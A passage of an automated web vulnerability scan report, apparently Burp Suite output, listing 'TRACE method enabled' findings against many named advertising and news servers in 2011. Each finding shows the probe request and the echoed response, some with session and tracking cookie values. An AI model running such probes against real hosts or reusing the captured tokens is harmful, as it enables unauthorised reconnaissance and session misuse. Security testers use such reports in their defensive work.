24.8. http://ads.reach360ads.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.reach360ads.com
Cookie: 696293c1b279339d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.reach360ads.com
Cookie: 696293c1b279339d; OAID=7202eec1614b307b4ef4ca8cc06d6074; _OXLIA[1858]=deleted; %5FOXLIA%5B1858%5D=deleted; OXLIA=1858.lqz82s-1254


24.9. http://ads3.bangkokpost.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads3.bangkokpost.co.th
Path:   /

Request

TRACE / HTTP/1.0
Host: ads3.bangkokpost.co.th
Cookie: 76e956c8ed310dd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads3.bangkokpost.co.th
Cookie: 76e956c8ed310dd; OAID=7580d7a472c1671f0571dd788a382b2b


24.10. http://ads4.bangkokpost.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads4.bangkokpost.co.th
Path:   /

Request

TRACE / HTTP/1.0
Host: ads4.bangkokpost.co.th
Cookie: b642611c9eaea476

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:52:24 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads4.bangkokpost.co.th
Cookie: b642611c9eaea476


24.11. http://adssrv.nationmultimedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adssrv.nationmultimedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: adssrv.nationmultimedia.com
Cookie: 98fd2363760109a4

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: adssrv.nationmultimedia.com
Cookie: 98fd2363760109a4
Via: CN-5000
X-Forwarded-For: 50.23.123.106
Connection: Keep-Alive


24.12. http://adstil.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: adstil.indiatimes.com
Cookie: 9cfa5a0554d31a23

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9cfa5a0554d31a23; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; _chartbeat2=8l1yir8xsllibs89
...[SNIP]...

24.13. http://advertising.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: f35d53b6e38729bc

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: f35d53b6e38729bc
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.14. http://avn.innity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://avn.innity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: avn.innity.com
Cookie: 2c12ae6cfac80bc9

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: avn.innity.com
Cookie: 2c12ae6cfac80bc9; iUB=35480.1%3B; iUC=3898.1%3B; iUUID=3ec12b035c5d013fb13deb7123891e21
X-Forwarded-For: 50.23.123.106


24.15. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 13e82fde5cbc19ab

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 769
Date: Sun, 04 Sep 2011 03:58:56 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 13e82fde5cbc19ab; V=ZZVrXBMk1mFi; cwbh1=996%3B09%2F04%2F2011%3BFACO1%0A3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5; C2W4=3ncqaSewwHBKMpwXEV2xPrPwuGXdzMM__jVZBsuS4rDtkvyKd_yspGw; pb_rtb_ev="1:530739.4e
...[SNIP]...

24.16. http://clk.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: 7738611e896ed636

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: 7738611e896ed636; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; kwd=1_1315107001; scg=1_1315107001; ppd=1_1315107001; act=1_1315107001; eng=1_1315107125_75:
...[SNIP]...

24.17. http://cps.regis.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cps.regis.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: cps.regis.edu
Cookie: 792c1c4c9a24a82f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cps.regis.edu
Cookie: 792c1c4c9a24a82f; PHPSESSID=d4f885c2d7137960ddd9c79e885ce75a


24.18. http://d.tradex.openx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 2f44f3408c7958c5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:16 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 2f44f3408c7958c5; OAID=c5db95c36674fba9b15e93c0a5317c9e; OAVARS[default]=DEFAULT; OXRB=28_4196
Connection: close
X-Forwarded-For: 50.23.123.106, 10.1.253.2


24.19. http://dna1.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dna1.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dna1.mookie1.com
Cookie: 8e2c2817f9343807

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:56 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dna1.mookie1.com
Cookie: 8e2c2817f9343807; OAX=Mhd7ak5i73gACV1S; id=1618487237813502; mdata=1|1618487237813502|1315106699
Connection: Keep-Alive
DNA_IP: 50.23.123.106


24.20. http://domdex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: domdex.com
Cookie: f9e5501002b4ec91

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:00:13 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: domdex.com
Cookie: f9e5501002b4ec91; optout=1
X-Forwarded-For: 50.23.123.106


24.21. http://dp.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dp.33across.com
Cookie: c5accd820f559aa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dp.33across.com
Cookie: c5accd820f559aa; 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C
X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


24.22. http://ecommerce.nationgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.nationgroup.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ecommerce.nationgroup.com
Cookie: 51e73a1bf8be24a1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:02 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ecommerce.nationgroup.com
Cookie: 51e73a1bf8be24a1


24.23. http://feed.mikle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: feed.mikle.com
Cookie: 2e14108d177ee06d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: feed.mikle.com
Cookie: 2e14108d177ee06d


24.24. http://fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: fetchback.com
Cookie: 3b6931c309747cb

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:02:53 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: fetchback.com
Cookie: 3b6931c309747cb; act=1_1315103291; apd=1_1315133969; bpd=1_1315133969; cmp=1_1315133969_16771:240287; clk=1_1315133969; cre=1_1315133969_34024:68324:1:30678:30678_34021:68285:1:36684:36684_34024:68283:2:36918:37010_3
...[SNIP]...

24.25. http://ibeat.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibeat.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ibeat.indiatimes.com
Cookie: 6fb208809872498

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:13:11 GMT
Server: Apache/2.2.11 (Unix) mod_jk/1.2.26
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ibeat.indiatimes.com
Cookie: 6fb208809872498; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2c
...[SNIP]...

24.26. http://idiva.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idiva.com
Path:   /

Request

TRACE / HTTP/1.0
Host: idiva.com
Cookie: 85ca9abf15c7549c

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: idiva.com
Cookie: 85ca9abf15c7549c; fromSite=deleted


24.27. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 19111588e035b0da

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:44:41 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 19111588e035b0da; KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.1928_1315860702.78_1408030145.390_1321207886.2072_1316038897.1039_1316395932; KRTBCOOKIE_22=488-pcv:1|uid:9
...[SNIP]...

24.28. http://img.pulsemgr.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /

Request

TRACE / HTTP/1.0
Host: img.pulsemgr.com
Cookie: 8b788128807caeee

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:03 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: img.pulsemgr.com
Cookie: 8b788128807caeee


24.29. http://imp.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 41160e707a389aed

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 41160e707a389aed; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; clk=1_1315104807; cre=1_1315104822_34024:68324:1:1531:1531_34021:68285:1:7537:7537_34024:682
...[SNIP]...

24.30. http://login.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: a074e0c21416556e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:24:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: a074e0c21416556e; Apache=50.23.123.106.1315133964684143; rt_1982=2; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaV0%3D; Dotom
...[SNIP]...

24.31. http://matcher-rbc.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: f5e0bbc939da2032

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: f5e0bbc939da2032; OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146
Connection: Keep-Alive
MIG_IP: 50.23.123.106


24.32. http://member.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: member.bangkokpost.com
Cookie: 728585d78f9b878b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:28:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: member.bangkokpost.com
Cookie: 728585d78f9b878b; PHPSESSID=9v95tfjgt6detikatqtcamm211; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmc
...[SNIP]...

24.33. http://mobile.indiatimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.indiatimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mobile.indiatimes.com
Cookie: 4201b52236a51f52

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:49 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7f DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: mobile.indiatimes.com
Cookie: 4201b52236a51f52; sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2c
...[SNIP]...

24.34. http://nai.ad.us-ec.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.ad.us-ec.adtechus.com
Cookie: 9c0a717a793dce6d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.ad.us-ec.adtechus.com
Cookie: 9c0a717a793dce6d; OO_TOKEN=606685983; OptOut=we will not set any more cookies; JEB2=NOID
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.35. http://nai.adserver.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserver.adtechus.com
Cookie: 8394be3a9d00ddf1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserver.adtechus.com
Cookie: 8394be3a9d00ddf1; JEB2=NOID; OO_TOKEN=110979794; CfP=1; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.36. http://nai.adserverec.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserverec.adtechus.com
Cookie: bc6202aa8430cb47

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserverec.adtechus.com
Cookie: bc6202aa8430cb47; OO_TOKEN=1687865702; OptOut=we will not set any more cookies; JEB2=NOID
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.37. http://nai.adserverwc.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserverwc.adtechus.com
Cookie: 201ef90d903380bd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserverwc.adtechus.com
Cookie: 201ef90d903380bd; OO_TOKEN=1922969445; OptOut=we will not set any more cookies; JEB2=NOID
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.38. http://nai.adsonar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adsonar.com
Cookie: f7fb8ccc97463dfd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adsonar.com
Cookie: f7fb8ccc97463dfd; OO_TOKEN=434026777; oo_flag=t
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.39. http://nai.adtech.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adtech.de
Cookie: 9dab77cca7ef9e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adtech.de
Cookie: 9dab77cca7ef9e; JEB2=NOID; OO_TOKEN=158356570; CfP=1; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.40. http://nai.advertising.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.advertising.com
Cookie: 1c0a30e0f1424d93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.advertising.com
Cookie: 1c0a30e0f1424d93; GUID=DELETED; C2=DELETED; F1=DELETED; BASE=DELETED; ROLL=DELETED; aceRTB=DELETED; ACID=optout!; OO_TOKEN=154978535; ASCID=Rq690013151032380008; 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_;
...[SNIP]...

24.41. http://nai.btrll.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.btrll.com
Cookie: 54a0fe38bf985242

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:08 GMT
Server: Apache/2.0.63 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.btrll.com
Cookie: 54a0fe38bf985242; BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4
X-EKC-SRM-ARM: 50.23.123.106


24.42. http://nai.glb.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.glb.adtechus.com
Cookie: 723bc6f0068d35b1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.glb.adtechus.com
Cookie: 723bc6f0068d35b1; OO_TOKEN=1074350551; OptOut=we will not set any more cookies; JEB2=NOID
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106


24.43. http://nai.tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.tacoda.at.atwola.com
Cookie: 10067da25be15434

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.tacoda.at.atwola.com
Cookie: 10067da25be15434; eadx=DELETED; ATTACID=DELETED; ANRTT=DELETED; TData=DELETED; N=DELETED; ATTAC=DELETED; OO_TOKEN=459941398; atdses=O
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.
...[SNIP]...

24.44. http://nocookie.w55c.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nocookie.w55c.net
Path:   /

Request

TRACE / HTTP/1.0
Host: nocookie.w55c.net
Cookie: b8dc10a602bfab89

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nocookie.w55c.net
Cookie: b8dc10a602bfab89; matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F


24.45. http://notrack.adviva.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.adviva.net
Cookie: 54b03ab158f0f873

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:53 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.adviva.net
Cookie: 54b03ab158f0f873; ADVIVA=NOTRACK


24.46. http://notrack.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.specificclick.net
Cookie: 8f916323faafdcfa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:06:27 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.specificclick.net
Cookie: 8f916323faafdcfa; ug=1; ADVIVA=NOTRACK


24.47. http://notrack.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.specificmedia.com
Cookie: 38a3deabef53b90e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:03:42 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.specificmedia.com
Cookie: 38a3deabef53b90e; ADVIVA=NOTRACK


24.48. http://optimized-by.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 7ed301468206c7b2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:16 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 7ed301468206c7b2; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145
...[SNIP]...

24.49. http://optout.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.33across.com
Cookie: d021ce4f2342c413

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:07:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.33across.com
Cookie: d021ce4f2342c413; 33x_ps=deleted; 33x_nc=33Across+Optout


24.50. http://optout.adlegend.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.adlegend.com
Cookie: ebe912b02688cc83

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:03:58 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.adlegend.com
Cookie: ebe912b02688cc83; ID=OPT_OUT; PrefID=deleted; CSList=deleted


24.51. http://optout.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.com
Cookie: 964b8709daa897ce

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:02:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.com
